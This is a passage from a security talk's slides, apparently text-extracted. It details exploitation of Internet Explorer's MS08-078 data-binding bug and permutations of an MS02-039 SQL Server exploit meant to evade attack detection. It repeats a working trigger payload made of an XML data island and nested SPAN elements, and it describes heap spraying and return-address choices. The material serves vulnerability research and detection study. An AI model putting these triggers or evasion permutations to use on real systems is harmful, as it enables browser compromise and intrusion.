  71. 71. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  72. 72. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  73. 73. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  74. 74. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::RemoveBinding DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  75. 75. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 _MemFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  76. 76. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 HeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  77. 77. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlFreeHeap DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  78. 78. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlpLowFragHeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  79. 79. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplAry::Delete DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  80. 80. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::Detach DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  81. 81. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  82. 82. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  83. 83. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  84. 84. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  85. 85. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  86. 86. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  87. 87. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  88. 88. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  89. 89. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  90. 90. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  91. 91. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  92. 92. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  93. 93. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  94. 94. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  95. 95. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  96. 96. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD Trigger0 a 0 a 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t 0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  97. 97. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC Permutation 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t DATAFLD 0a0a0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  98. 98. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATAFLD 0x0a0a0a0a Exploitation shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  99. 99. Approach Unconditional Vulnerability Complete (YES) Incomplete (NO) Vulnerable Documentation? Document Alternatives? Ecosystem Reverse Reversing? Alternatives? Alternatives Engineer Obfuscation Exploitation Arbitrary code Alternatives Detection Attack detection Permutation
  100. 100. POPed MS02-039• SQL Request: • JUMP: – CLNT_UCAST_INST (0x04). – Unconditional JUMP short, relative, and forward to REL8.• SQL INSTANCENAME: – There are 115 possible values to REL8. – ASCII hexa values from 0x01 to 0xff, except: – 115 permutations. 0x0a, 0x0d, , 0x2f, 0x3a and 0x5c. – 24,000 permutations. • Writable address and memory alignment: – There are 26,758 new writable addresses within• Return address: SQLSORT.DLL (Microsoft SQL Server 2000 – Uses the “jump to register” technique, in this SP0/SP1/SP2). There are much more writable case the ESP register. addresses if do not mind making it hardcoded. – There are four (4) new possible return addresses – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and within SQLSORT.DLL (Microsoft SQL Server “OlyDBG 2.01 alpha 2” by Oleh Yuschuk. 2000 SP0/SP1/SP2). There are much more return – 26,758 permutations. addresses if do not mind making it hardcoded. – Tools: “Findjmp.c” by Ryan Permeh, (“Hacking • Padding and memory alignment: Proof your Network – Second Edition”, 2002), – ASCII hexa values from 0x01 to 0xff. and “DumpOp.c” by Koskya Kortchinsky (“Macro – The length may vary, depending on JUMP, from reliability in Win32 Exploits” – Black Hat Europe, 3,048 to 29,210 possibilities. 2007). – 29,210 permutations. – 4 permutations.
  101. 101. POPed MS08-078
  102. 102. POPed MS08-078
  103. 103. POPed MS08-078 CVE-2008-4844 “…crafted XML document containing nested <SPAN> elements…”
  104. 104. POPed MS08-078 CVE-2008-4844 “…crafted XML document containing nested <SPAN> elements…”
  105. 105. POPed MS08-078• XML Data Island: • Data Consumer (HTML elements): – There are two (2) options: using the Dynamic – According to MSDN (“Binding HTML Elements HTML (DHTML) <XML> element within the to Data”) there are, at least, fifteen (15) bindable HTML document or overloading the HTML HTML elements available, but only five (5) <SCRIPT> element. Unfortunately, the HTML elements are useful. <SCRIPT> element is useless. – The HTML element is a key trigger, because it points to a dereferenced XML DSO, but it does• Data Source Object (DSO): not have to be the same HTML element to do so – The HTML <XML> element holds a reference – it can be any mixed HTML element. to a XML DSO, but a XML DSO can also be a – 25 permutations. reference used by another HTML element: • <OBJECT>. • Return address: – The HTML <OBJECT> element uses Class ID – Uses “Heap Spray” technique, in this case the to reference: XML DSO or Tabular Data XML DSO handles the return address, and can Control (TDC). use “.NET DLL” technique by Mark Dowd and – 4 permutations. Alexander Sotirov (“How to Impress Girls with Browser Memory Protection Bypasses” – Black Hat USA, 2008).• Reference: – There are, at least, four (4) new possible return – Characters like “<” and “&” are illegal in <XML> addresses. element. To avoid errors <XML> element can be defined as CDATA (Unparsed Character Data). – 4 permutations. But the <XML> element can be also defined as “&lt;” instead of “<”. – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO. – 4 permutations.
  106. 106. POPed MS08-078• XML Data Island: • Data Consumer (HTML elements): – There are two (2) options: using the Dynamic – According to MSDN (“Binding HTML Elements HTML (DHTML) <XML> element within the to Data”) there are, at least, fifteen (15) bindable HTML document or overloading the HTML HTML elements available, but only five (5) <SCRIPT> element. Unfortunately, the HTML elements are useful. <SCRIPT> element is useless. – The HTML element is a key trigger, because it points to a dereferenced XML DSO, but it does• Data Source Object (DSO): not have to be the same HTML element to do so – The HTML <XML> element holds a reference – it can be any mixed HTML element. to a XML DSO, but a XML DSO can also be a – 25 permutations. reference used by another HTML element: • <OBJECT>. • Return address: – The HTML <OBJECT> element uses Class ID – Uses “Heap Spray” technique, in this case the to reference: XML DSO or Tabular Data XML DSO handles the return address, and can Control (TDC). use “.NET DLL” technique by Mark Dowd and – 4 permutations. Alexander Sotirov (“How to Impress Girls with Browser Memory Protection Bypasses” – Black Hat USA, 2008).• Reference: – There are, at least, four (4) new possible return – Characters like “<” and “&” are illegal in <XML> addresses. element. To avoid errors <XML> element can be defined as CDATA (Unparsed Character Data). – 4 permutations. But the <XML> element can be also defined as “&lt;” instead of “<”. – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO. – 4 permutations.

×